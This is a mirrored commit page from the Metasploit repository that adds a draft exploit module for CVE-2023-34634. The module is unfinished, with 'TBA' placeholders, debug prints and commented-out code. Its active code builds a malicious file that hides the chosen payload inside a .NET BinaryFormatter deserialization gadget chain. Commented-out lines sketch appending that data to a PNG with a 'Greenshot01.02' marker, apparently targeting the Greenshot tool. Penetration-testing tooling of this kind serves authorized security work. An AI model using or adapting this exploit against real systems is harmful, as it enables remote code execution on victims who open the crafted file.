mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-07-18 18:31:41 +02:00
First attempt at CVE-2023-34634
This commit is contained in:
parent
cd8cd0a52b
commit
59e3760509
BIN
data/exploits/cve-2023-34634/test.png
Normal file
BIN
data/exploits/cve-2023-34634/test.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 256 KiB |
@ -0,0 +1,82 @@
|
||||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Post::File
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'TBA',
|
||||
'Description' => %q{
|
||||
TBA
|
||||
},
|
||||
'DisclosureDate' => '2023-07-26',
|
||||
'Author' => [
|
||||
'p4r4bellum', # Discovery
|
||||
'bwatters-r7', # msf exploit
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2023-34634'],
|
||||
['EDB', '51633']
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Targets' => [
|
||||
[
|
||||
'Windows Command',
|
||||
{
|
||||
'Arch' => ARCH_CMD,
|
||||
'Type' => :windows_command,
|
||||
'Space' => 3000
|
||||
}
|
||||
]
|
||||
],
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SAFE],
|
||||
'Reliability' => [REPEATABLE_SESSION],
|
||||
'SideEffects' => [ARTIFACTS_ON_DISK]
|
||||
}
|
||||
)
|
||||
)
|
||||
|
||||
register_options([
|
||||
OptPath.new('PNG_FILE', [false, 'PNG file to use', 'xyz'])
|
||||
])
|
||||
end
|
||||
|
||||
def exploit
|
||||
vprint_status('Hello')
|
||||
if datastore['PNG_FILE'].blank?
|
||||
File.join(Msf::Config.data_directory, 'exploits', 'cve-2023-34634', 'test.png')
|
||||
else
|
||||
datastore['PNG_FILE']
|
||||
end
|
||||
|
||||
cmd = payload.encoded
|
||||
# cmd = 'calc'
|
||||
|
||||
# image_data = File.binread(image_file)
|
||||
|
||||
deserialize_cmd = ::Msf::Util::DotNetDeserialization.generate(
|
||||
cmd,
|
||||
gadget_chain: :WindowsIdentity,
|
||||
formatter: :BinaryFormatter
|
||||
)
|
||||
file_create(deserialize_cmd)
|
||||
# vprint_status('Hello1')
|
||||
# exploit_data = image_data + deserialize_cmd
|
||||
# vprint_status('Hello2')
|
||||
# exploit_data << [exploit_data.length].pack('Q')
|
||||
# vprint_status('Hello3')
|
||||
# exploit_data << "Greenshot01.02"
|
||||
# vprint_status('Hello4')
|
||||
# file_create(exploit_data)
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue
Block a user